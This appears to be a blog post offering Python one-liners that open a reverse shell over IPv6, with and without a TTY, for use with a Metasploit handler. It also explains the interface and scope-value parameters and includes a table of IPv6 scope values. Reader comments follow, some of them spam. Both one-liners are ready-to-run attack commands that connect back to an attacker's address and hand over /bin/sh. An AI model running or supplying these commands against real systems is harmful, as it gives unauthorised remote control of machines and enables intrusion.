If you find yourself needing to gain a reverse shell with a TTY over IPv6, here is a python one-liner that you can use. This will work with Metasploit's "exploit/multi/handler" module with the "linux/x86/shell/reverse_ipv6_tcp" payload.
There are a few key aspects about connecting over IPv6 with this method that you should also be aware of. You must specify what interface you want to use (even if there is only one) and you must specify the IPv6 Scope Value. The IPv6 Scope Value specifies what type of address you are connecting to. In the example below, we have an IPv6 address that starts with "fe80", which is a link-local address. In this case, the Scope Value would be "2".
Legend:
= Your IPv6 Connect Back Address
= The system's network interface to use
= Port number
= IPv6 Scope Value
$ python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("fe80::ccc:2999:ffff:aaaa%eth0",2222,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
If for some reason you wanted a reverse shell without a TTY:
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("fe80::ccc:2999:ffff:aaaa%eth0",2222,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Value | Scope name | Notes |
---|---|---|
0x0 | reserved | |
0x1 | interface-local | Interface-local scope spans only a single interface on a node, and is useful only for loopback transmission of multicast. |
0x2 | link-local | Link-local and site-local multicast scopes span the same topological regions as the corresponding unicast scopes. |
0x4 | admin-local | Admin-local scope is the smallest scope that must be administratively configured, i.e., not automatically derived from physical connectivity or other, non- multicast-related configuration. |
0x5 | site-local | Link-local and site-local multicast scopes span the same topological regions as the corresponding unicast scopes. |
0x8 | organization-local | Organization-local scope is intended to span multiple sites belonging to a single organization. |
0xe | global | |
0xf | reserved |
Your blog has given me that thing which I never expect to get from all over the websites. Nice post guys!
ReplyDeleteThanks a lot for this article! Very detailed and useful explanations provided here.
ReplyDeletesalt likit
ReplyDeletesalt likit
dr mood likit
big boss likit
dl likit
dark likit
A4TP4Z